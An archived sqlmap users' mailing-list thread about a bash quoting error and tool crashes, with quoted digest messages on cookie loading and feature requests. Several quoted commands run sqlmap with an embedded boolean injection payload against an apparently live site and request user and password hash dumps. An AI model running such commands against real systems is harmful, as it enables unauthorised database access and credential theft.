Re: [sqlmap-users] 回复: sqlmap-user event not found error
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] 回复: sqlmap-user event not found error
|
From: Miroslav S. <mir...@gm...> - 2014-05-13 13:40:33
|
Hi Bob.
It's a bash problem (reproduced it this moment). Using single quotes (')
instead of double quotes (") should solve this issue.
Kind regards,
Miroslav Stampar
On Tue, May 13, 2014 at 5:05 AM, Bob <sto...@qq...> wrote:
>
> Hi Miroslav,
>
> Thanks for your email,
>
> but still the same after i tried sqlmap -u ".."
>
>
>
> sqlmap -u "
> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=aa
> "
> bash: !search.do?keyword=: event not found
>
>
> best regards
> bob
> ------------------
>
>
>
>
> ------------------ 原始邮件 ------------------
> *发件人:* "Miroslav Stampar";<mir...@gm...>;
> *发送时间:* 2014年5月11日(星期天) 晚上10:38
> *收件人:* "Bob"<sto...@qq...>;
> *抄送:* "SqlMap List"<sql...@li...>;
> *主题:* Re: [sqlmap-users] sqlmap-user event not found error
>
> Hi Bob.
>
> Please enclose the url part with quotes (e.g. ./sqlmap.py -u "..." ...)
>
> Kind regards,
> Miroslav Stampar
>
>
> On Sun, May 11, 2014 at 8:32 AM, Bob <sto...@qq...> wrote:
>
>> Hi friend,
>>
>> I have problem with ! inside URL .
>>
>> /sqlmap.py -u
>> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=-p input_mailbar --dbms=MySQL --risk=3 --level=5 -o --param-del=
>> bash: !search.do?keyword=: event not found
>>
>> How should i do ?
>>
>> thanks
>>
>> bob
>> ------------------
>>
>>
>>
>>
>> ------------------ Original ------------------
>> *From: * "Miroslav Stampar";<mir...@gm...>;
>> *Date: * Fri, May 31, 2013 03:00 AM
>> *To: * "Bob"<sto...@qq...>;
>> *Cc: * "sqlmap-users"<sql...@li...>;
>> *Subject: * Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1
>>
>> Hi.
>> Have you been able to retrieve user names normally? I mean, were they
>> normally been displayed in console output?
>> Also, is boolean technique the only one detected by sqlmap in your case
>> (or maybe UNION)?
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:
>>
>>> Hi friend,
>>>
>>>
>>> Could you help me with this bug ?
>>>
>>>
>>> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
>>> run with the latest development version from the GitHub repository. If the
>>> exception persists, please send by e-mail to '
>>> sql...@li...' or open a new issue at '
>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>> text and any information required to reproduce the bug. The developers will
>>> try to reproduce the bug, fix it accordingly and get back to you.
>>> sqlmap version: 1.0-dev
>>> Python version: 2.7.3
>>> Operating system: posix
>>> Command line: ./sqlmap -u
>>> ***********************************************
>>> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP
>>> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft
>>> SQL Server --users --passwords
>>> Technique: BOOLEAN
>>> Back-end DBMS: Microsoft SQL Server (fingerprinted)
>>> Traceback (most recent call last):
>>> File "./sqlmap", line 87, in main
>>> start()
>>> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
>>> action()
>>> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
>>> conf.dbmsHandler.getPasswordHashes(), "password hash",
>>> CONTENT_TYPE.PASSWORDS)
>>> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in
>>> getPasswordHashes
>>> if user in retrievedUsers:
>>> TypeError: unhashable type: 'list'
>>>
>>> [*] shutting down at 22:54:12
>>> Thanks
>>>
>>> BOB
>>>
>>>
>>> ------------------ Original ------------------
>>> *From: * "sqlmap-users-request"<
>>> sql...@li...>;
>>> *Date: * May 29, 2013
>>> *To: * "sqlmap-users"<sql...@li...>;
>>> *Subject: * sqlmap-users Digest, Vol 31, Issue 1
>>>
>>> Send sqlmap-users mailing list submissions to
>>> sql...@li...
>>>
>>> To subscribe or unsubscribe via the World Wide Web, visit
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> or, via email, send a message with subject or body 'help' to
>>> sql...@li...
>>>
>>> You can reach the person managing the list at
>>> sql...@li...
>>>
>>> When replying, please edit your Subject line so it is more specific
>>> than "Re: Contents of sqlmap-users digest..."
>>>
>>>
>>> Today's Topics:
>>>
>>> 1. Re: Feature request (David Guimaraes)
>>> 2. Re: --load-cookies (Dirk Wetter)
>>> 3. Re: --load-cookies (Miroslav Stampar)
>>> 4. Re: Patch for /task/<task_id>/delete in clean_filesystem
>>> (Miroslav Stampar)
>>> 5. Re: --load-cookies (Dirk Wetter)
>>> 6. --host parameter (co...@5i...)
>>> 7. Sqlmap and direct connect error (???????? ??????)
>>> 8. Re: --host parameter (Miroslav Stampar)
>>> 9. Re: Sqlmap and direct connect error (Miroslav Stampar)
>>> 10. feature request: offline mode for --dns-domain? (buawig)
>>> 11. feature request: --dns-domain for non-root users (--dns-port)
>>> (buawig)
>>> 12. Domain credentials (Brian Milliron)
>>> 13. Re: Domain credentials (Brandon Perry)
>>> 14. Re: feature request: offline mode for --dns-domain?
>>> (Miroslav Stampar)
>>> 15. Re: Domain credentials (Miroslav Stampar)
>>> 16. Re: feature request: fetch DNS queries from DNS server via
>>> HTTP (buawig)
>>> 17. Re: feature request: fetch DNS queries from DNS server via
>>> HTTP (Miroslav Stampar)
>>> 18. MySQL error based technique bug (Konrads Smelkovs)
>>> 19. Re: MySQL error based technique bug (Miroslav Stampar)
>>> 20. SQLmap crashing (Phillip Wylie)
>>> 21. Re: SQLmap crashing (Miroslav Stampar)
>>> 22. Custom injection payload in POST (Marcell Fodor)
>>> 23. Re: SQLmap crashing (Miroslav Stampar)
>>> 24. I got error on windows (warezhacking)
>>> 25. Appending to a dump (Stephen Shkardoon)
>>> 26. Re: Appending to a dump (Miroslav Stampar)
>>> 27. Re: Appending to a dump (Stephen Shkardoon)
>>> 28. Re: Appending to a dump (Miroslav Stampar)
>>> 29. --ignore-404 ? (buawig)
>>> 30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>> from 1 for 1) (buawig)
>>> 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>> from 1 for 1) (Miroslav Stampar)
>>> 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>> from 1 for 1) (Miroslav Stampar)
>>> 33. Re: --ignore-404 ? (Miroslav Stampar)
>>> 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
>>> 35. Re: BUG...!!!! o.O (Miroslav Stampar)
>>> 36. gun...@gm... wants to follow you. Accept?
>>> (gun...@gm...)
>>> 37. Direct access to mysql database (Marcell Fodor)
>>> 38. Re: Direct access to mysql database (Miroslav Stampar)
>>> 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
>>> (Badoo)
>>> 40. Not getting any sensitive data from database (Marcell Fodor)
>>> 41. Re: Not getting any sensitive data from database
>>> (Miroslav Stampar)
>>> 42. unhandled exception (kvasilopoulos)
>>> 43. [SQLMAP] Unhandled exception for IPv6
>>> (e.n...@st...)
>>> 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>>> 45. Re: unhandled exception (Miroslav Stampar)
>>> 46. Passing SOAPAction in --header (Brandon Perry)
>>> 47. Re: Passing SOAPAction in --header (Miroslav Stampar)
>>> 48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>>> 49. Blind SQL Injection question (Guy Dufour)
>>> 50. Re: Blind SQL Injection question (Chris Oakley)
>>> 51. Re: Passing SOAPAction in --header (Brandon Perry)
>>> 52. Re: Passing SOAPAction in --header (Brandon Perry)
>>> 53. Deploy&Create SSH/tunnel with compromised MSSQL server
>>> (Alok Kumar)
>>> 54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>> (Brandon Perry)
>>> 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>> (Alok Kumar)
>>> 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>> (Brandon Perry)
>>> 57. SQLMAP Bug (Joe O'Hara)
>>> 58. Re: SQLMAP Bug (Miroslav Stampar)
>>> 59. [CRITICAL] (Thai Thao)
>>> 60. Re: [CRITICAL] (Miroslav Stampar)
>>> 61. Providing multiple dbms (Sebastian Nerz)
>>> 62. Re: Providing multiple dbms (Miroslav Stampar)
>>>
>>>
>>> ----------------------------------------------------------------------
>>>
>>> Message: 1
>>> Date: Sat, 13 Apr 2013 21:40:39 -0300
>>> From: David Guimaraes <sk...@gm...>
>>> Subject: Re: [sqlmap-users] Feature request
>>> To: Miroslav Stampar <mir...@gm...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID:
>>> <CAJ...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Good question Miroslav.. I tried to think in something that can be
>>> implemented without ruin sqlmap query schema, but I could not come to any
>>> conclusion... =(
>>>
>>> The thing is, sqlsus use a different approch to dump the data, making
>>> this
>>> kind of thing possible...
>>>
>>> The solution that I found in this particular scenario is to use sqlsus,
>>> unfortunately...
>>>
>>> Regards.
>>>
>>> David
>>>
>>>
>>> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <
>>> mir...@gm...
>>> > wrote:
>>>
>>> > Hi David.
>>> >
>>> > And what do you recommend to be done in case of query with length >
>>> > max_inj_length?
>>> >
>>> > Kind regards,
>>> > Miroslav Stampar
>>> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
>>> >
>>> >> Hi, I am trying to perform sql injection on a web site but I can not
>>> get
>>> >> successful due to a size limitation on the query sent to the server.
>>> The
>>> >> server is limiting the size of query in 512 bytes only and sqlmap do
>>> not
>>> >> have any customization that allows me to bypass this restriction like
>>> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called
>>> "autoconf"
>>> >> that measure the permited query size.
>>> >>
>>> >> There is some chance to put this kind of feature in sqlmap?
>>> >>
>>> >> Thanks.
>>> >>
>>> >> --
>>> >> David Gomes Guimar?es
>>> >>
>>> >>
>>> >>
>>> ------------------------------------------------------------------------------
>>> >> Own the Future-Intel® Level Up Game Demo Contest 2013
>>> >> Rise to greatness in Intel's independent game demo contest.
>>> >> Compete for recognition, cash, and the chance to get your game
>>> >> on Steam. $5K grand prize plus 10 genre and skill prizes.
>>> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
>>> >> _______________________________________________
>>> >> sqlmap-users mailing list
>>> >> sql...@li...
>>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> >>
>>> >>
>>>
>>>
>>> --
>>> David Gomes Guimar?es
>>> -------------- next part --------------
>>> An HTML attachment was scrubbed...
>>>
>>> ------------------------------
>>>
>>> Message: 2
>>> Date: Mon, 15 Apr 2013 11:36:37 +0200
>>> From: Dirk Wetter <sp...@dr...>
>>> Subject: Re: [sqlmap-users] --load-cookies
>>> To: Miroslav Stampar <mir...@gm...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID: <516...@dr...>
>>> Content-Type: text/plain; charset=ISO-8859-1
>>>
>>>
>>>
>>> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>> > Nevertheless, with the latest commit that check should be
>>> "neutralized" now. Could you please retry it now?
>>>
>>> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>> hiccups, using the same file:
>>>
>>> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>> bug!
>>> Traceback (most recent call last):
>>> File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>>> _really_load
>>> assert domain_specified == initial_dot
>>> AssertionError
>>>
>>> _warn_unhandled_exception()
>>> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
>>> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>>
>>> the 999.. looks strange to me.
>>>
>>> >
>>> >
>>> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>>> mir...@gm... <mailto:mir...@gm...>> wrote:
>>> >
>>> > Hi Dirk.
>>> >
>>> > Well, I would say that you have an expired cookie. Do you see that
>>> value 0? That value should be a valid UNIX time representing time of cookie
>>> expiration. Also, I've just tested that cookie of yours and sqlmap says:
>>> "[WARNING] cookie '....' has expired"
>>> >
>>>
>>> that's true but IMO 0 represents just a session cookie. Example:
>>>
>>> prompt% wget -q -O /dev/null --keep-session-cookies
>>> --save-cookies=/dev/stdout bing.com
>>> # HTTP cookie file.
>>> # Generated by Wget on 2013-04-15 11:23:13.
>>> # Edit at your own risk.
>>>
>>> .bing.com TRUE / FALSE 1429089794 SRCHUSR
>>> AUTOREDIR=0&GEOVAR=&DOB=20130415
>>> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
>>> .bing.com TRUE / FALSE 1429089794 OrigMUID
>>> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
>>> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
>>> .bing.com TRUE / FALSE 0 _HOP
>>> .bing.com TRUE / FALSE 0 _FS NU=1
>>> .bing.com TRUE / FALSE 1429089794 _FP EM=1
>>> www.bing.com FALSE / FALSE 1429089794 SRCHUID
>>> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>> www.bing.com FALSE / FALSE 1429089794 MUIDB
>>> 333995A69E06630B2EB491169F016314
>>>
>>> prompt%
>>>
>>> Same parser problem btw if I edit the cookie file and put 1429089794
>>> unix time instead of 0 in there.
>>>
>>> Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>>> but cookies w/ expiration date) and uses the last
>>> cookie only for the first 120 tries.
>>>
>>> Cheers, Dirk
>>>
>>>
>>> >
>>> > Kind regards,
>>> > Miroslav Stampar
>>> >
>>> >
>>> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...>> wrote:
>>> >
>>> >
>>> > Hi Miroslav,
>>> >
>>> > thx for your prompt answer.
>>> >
>>> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>> > > Hi Dirk.
>>> > >
>>> > > Could you please get the latest revision and retry it again?
>>> > ed5599f: almost the same: with cookie in the header sqlmap takes only
>>> this one.
>>> > The slight difference seems to be that in the case where I didn't
>>> supply a cookie
>>> > sqlmap doesn't use any cookie at all, i.e. now not the one from the
>>> server anymore.
>>> > >
>>> > > There was a situation where info messages have been wrongly written
>>> that original response contained Set-Cookie in situations like yours.
>>> > >
>>> > > In case that everything stays as it is, I'll need to ask you to
>>> provide more details. For example, cookie file would be great.
>>> >
>>> > sure, here you go:
>>> >
>>> > --snip
>>> > # Netscape HTTP Cookie File
>>> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>>> > [..]
>>> > --snap
>>> >
>>> > They are all session cookies. For easier reading here I put some
>>> blanks in the line
>>> > above, in "cookie-file" there aren't any though. Cookies were
>>> generated with
>>> > stompy and a shell script (looks he same as with
>>> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file>
>>> <URL>)
>>> >
>>> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>>> >
>>> > >
>>> > > Also, please make sure that the cookie file contains proper
>>> cookie(s) - domain name should be the same as a domain of target, cookie
>>> needs to have a proper valid time, etc.
>>> >
>>> > see above.
>>> >
>>> > Cheers,
>>> >
>>> > Dirk
>>> >
>>> > >
>>> > >
>>> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>
>>> wrote:
>>> > >
>>> > > Hi Miroslav,
>>> > >
>>> > > yes unfortunately.
>>> > >
>>> > > If I omit the cookie line in the request header completely, sqlmap
>>> > > seems to take the first cookie issued by the server with set-cookie
>>> (and
>>> > > put's it silently in).
>>> > >
>>> > > Cheers,
>>> > >
>>> > > Dirk
>>> > >
>>> > >
>>> > >
>>> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>> > > > Hi.
>>> > > >
>>> > > > And this is also happening if you are skipping "Cookie:
>>> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>>> > > >
>>> > > > Kind regards,
>>> > > > Miroslav Stampar
>>> > > >
>>> > > >
>>> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>> sp...@dr... <mailto:sp...@dr...>>>> wrote:
>>> > > >
>>> > > >
>>> > > > Hi folks,
>>> > > >
>>> > > > .... that doesn't work for me. It always uses the cookie supplied
>>> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>>> > > > from the 1st server reply is being used)
>>> > > >
>>> > > > So what is wrong in here:
>>> > > >
>>> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>> > > > --level=2 --risk=2 -r $REQUEST
>>> > > >
>>> > > > The content of the file $REQUEST is:
>>> > > >
>>> > > > POST <URL> HTTP/1.1
>>> > > > Host: <HOST>
>>> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US)
>>> AppleWebKit/525.13 (KHTML, like Gecko)
>>> > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <
>>> http://0.2.149.6> Safari/525.13
>>> > > > Accept:
>>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>> > > > Accept-Language: en-US,en;q=0.5
>>> > > > Accept-Encoding: gzip, deflate
>>> > > > Referer: <Referer>
>>> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>> > > > Connection: keep-alive
>>> > > > Content-Type: application/x-www-form-urlencoded
>>> > > > Content-Length: 67
>>> > > >
>>> > > > <abunchofpostparams>
>>> > > >
>>> > > >
>>> > > > No hints that cookie-file is not in correct format (I've been
>>> through this,
>>> > > > at least I think I so ;) ).
>>> > > >
>>> > > > Any insight would be much appreciated.
>>> > > >
>>> > > >
>>> > > > Cheers,
>>> > > >
>>> > > > Dirk
>>> > > >
>>> > > >
>>> > > >
>>> ------------------------------------------------------------------------------
>>> > > > Precog is a next-generation analytics platform capable of advanced
>>> > > > analytics on semi-structured data. The platform includes APIs for
>>> building
>>> > > > apps and a phenomenal toolset for data science. Developers can use
>>> > > > our toolset for easy data analysis & visualization. Get a free
>>> account!
>>> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > > > _______________________________________________
>>> > > > sqlmap-users mailing list
>>> > > > sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>>>
>>> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> > > >
>>> > > >
>>> > > >
>>> > > >
>>> > > > --
>>> > > > Miroslav Stampar
>>> > > > http://about.me/stamparm
>>> > >
>>> > >
>>> > >
>>> > >
>>> > > --
>>> > > Miroslav Stampar
>>> > > http://about.me/stamparm
>>> >
>>> >
>>> >
>>> >
>>> > --
>>> > Miroslav Stampar
>>> > http://about.me/stamparm
>>> >
>>> >
>>> >
>>> >
>>> > --
>>> > Miroslav Stampar
>>> > http://about.me/stamparm
>>>
>>>
>>>
>>>
>>> ------------------------------
>>>
>>> Message: 3
>>> Date: Mon, 15 Apr 2013 11:45:19 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] --load-cookies
>>> To: Dirk Wetter <sp...@dr...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID:
>>> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Hi Dirk.
>>>
>>> Now that crash should be "patched".
>>>
>>> Could you please retry it now and say if the latest revision suits your
>>> needs?
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>>
>>> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>>>
>>> >
>>> >
>>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>> > > Nevertheless, with the latest commit that check should be
>>> "neutralized"
>>> > now. Could you please retry it now?
>>> >
>>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>> > hiccups, using the same file:
>>> >
>>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>> bug!
>>> > Traceback (most recent call last):
>>> > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>>> > _really_load
>>> > assert domain_specified == initial_dot
>>> > AssertionError
>>> >
>>> > _warn_unhandled_exception()
>>> > [11:13:26] [CRITICAL] there was a problem loading cookies file
>>> ('invalid
>>> > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>>> >
>>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>> >
>>> > the 999.. looks strange to me.
>>> >
>>> > >
>>> > >
>>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>>> > mir...@gm... <mailto:mir...@gm...>> wrote:
>>> > >
>>> > > Hi Dirk.
>>> > >
>>> > > Well, I would say that you have an expired cookie. Do you see that
>>> > value 0? That value should be a valid UNIX time representing time of
>>> cookie
>>> > expiration. Also, I've just tested that cookie of yours and sqlmap
>>> says:
>>> > "[WARNING] cookie '....' has expired"
>>> > >
>>> >
>>> > that's true but IMO 0 represents just a session cookie. Example:
>>> >
>>> > prompt% wget -q -O /dev/null --keep-session-cookies
>>> > --save-cookies=/dev/stdout bing.com
>>> > # HTTP cookie file.
>>> > # Generated by Wget on 2013-04-15 11:23:13.
>>> > # Edit at your own risk.
>>> >
>>> > .bing.com TRUE / FALSE 1429089794 SRCHUSR
>>> > AUTOREDIR=0&GEOVAR=&DOB=20130415
>>> > .bing.com TRUE / FALSE 1429089794 SRCHD
>>> > D=2781203&MS=2781203&AF=NOFORM
>>> > .bing.com TRUE / FALSE 1429089794 OrigMUID
>>> > 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>> > .bing.com TRUE / FALSE 1429089794 MUID
>>> > 333995A69E06630B2EB491169F016314
>>> > .bing.com TRUE / FALSE 0 _SS
>>> > SID=B954CB7EDF8643CABAD8013F27A241E7
>>> > .bing.com TRUE / FALSE 0 _HOP
>>> > .bing.com TRUE / FALSE 0 _FS NU=1
>>> > .bing.com TRUE / FALSE 1429089794 _FP EM=1
>>> > www.bing.com FALSE / FALSE 1429089794 SRCHUID
>>> > V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>> > www.bing.com FALSE / FALSE 1429089794 MUIDB
>>> > 333995A69E06630B2EB491169F016314
>>> >
>>> > prompt%
>>> >
>>> > Same parser problem btw if I edit the cookie file and put 1429089794
>>> unix
>>> > time instead of 0 in there.
>>> >
>>> > Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>>> > but cookies w/ expiration date) and uses the last
>>> > cookie only for the first 120 tries.
>>> >
>>> > Cheers, Dirk
>>> >
>>> >
>>> > >
>>> > > Kind regards,
>>> > > Miroslav Stampar
>>> > >
>>> > >
>>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...
>>> <mailto:
>>> > sp...@dr...>> wrote:
>>> > >
>>> > >
>>> > > Hi Miroslav,
>>> > >
>>> > > thx for your prompt answer.
>>> > >
>>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>> > > > Hi Dirk.
>>> > > >
>>> > > > Could you please get the latest revision and retry it again?
>>> > > ed5599f: almost the same: with cookie in the header sqlmap takes
>>> > only this one.
>>> > > The slight difference seems to be that in the case where I
>>> > didn't supply a cookie
>>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from
>>> > the server anymore.
>>> > > >
>>> > > > There was a situation where info messages have been wrongly
>>> > written that original response contained Set-Cookie in situations like
>>> > yours.
>>> > > >
>>> > > > In case that everything stays as it is, I'll need to ask you
>>> > to provide more details. For example, cookie file would be great.
>>> > >
>>> > > sure, here you go:
>>> > >
>>> > > --snip
>>> > > # Netscape HTTP Cookie File
>>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID
>>> > \t <Cookie>
>>> > > [..]
>>> > > --snap
>>> > >
>>> > > They are all session cookies. For easier reading here I put some
>>> > blanks in the line
>>> > > above, in "cookie-file" there aren't any though. Cookies were
>>> > generated with
>>> > > stompy and a shell script (looks he same as with
>>> > > wget -S -O /dev/null --keep-session-cookies
>>> > --save-cookies=<file> <URL>)
>>> > >
>>> > > Again: sqlmap doesn't hiccup/complain while eating my cookies
>>> > file ;-)
>>> > >
>>> > > >
>>> > > > Also, please make sure that the cookie file contains proper
>>> > cookie(s) - domain name should be the same as a domain of target,
>>> cookie
>>> > needs to have a proper valid time, etc.
>>> > >
>>> > > see above.
>>> > >
>>> > > Cheers,
>>> > >
>>> > > Dirk
>>> > >
>>> > > >
>>> > > >
>>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
>>> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
>>> <mailto:
>>> > sp...@dr...>>> wrote:
>>> > > >
>>> > > > Hi Miroslav,
>>> > > >
>>> > > > yes unfortunately.
>>> > > >
>>> > > > If I omit the cookie line in the request header
>>> > completely, sqlmap
>>> > > > seems to take the first cookie issued by the server with
>>> > set-cookie (and
>>> > > > put's it silently in).
>>> > > >
>>> > > > Cheers,
>>> > > >
>>> > > > Dirk
>>> > > >
>>> > > >
>>> > > >
>>> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>> > > > > Hi.
>>> > > > >
>>> > > > > And this is also happening if you are skipping "Cookie:
>>> > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>>> > > > >
>>> > > > > Kind regards,
>>> > > > > Miroslav Stampar
>>> > > > >
>>> > > > >
>>> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
>>> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
>>> <mailto:
>>> > sp...@dr...>> <mailto:sp...@dr... <mailto:
>>> sp...@dr...>
>>> > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
>>> > > > >
>>> > > > >
>>> > > > > Hi folks,
>>> > > > >
>>> > > > > .... that doesn't work for me. It always uses the
>>> > cookie supplied
>>> > > > > (below in $REQUEST, or if I omit the line in
>>> > $REQUEST the one
>>> > > > > from the 1st server reply is being used)
>>> > > > >
>>> > > > > So what is wrong in here:
>>> > > > >
>>> > > > > cd
>>> > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>> > > > > --level=2 --risk=2 -r $REQUEST
>>> > > > >
>>> > > > > The content of the file $REQUEST is:
>>> > > > >
>>> > > > > POST <URL> HTTP/1.1
>>> > > > > Host: <HOST>
>>> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
>>> > en-US) AppleWebKit/525.13 (KHTML, like Gecko)
>>> > > > > Chrome/0.2.149.6 <http://0.2.149.6> <
>>> > http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>>> > > > > Accept:
>>> > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>> > > > > Accept-Language: en-US,en;q=0.5
>>> > > > > Accept-Encoding: gzip, deflate
>>> > > > > Referer: <Referer>
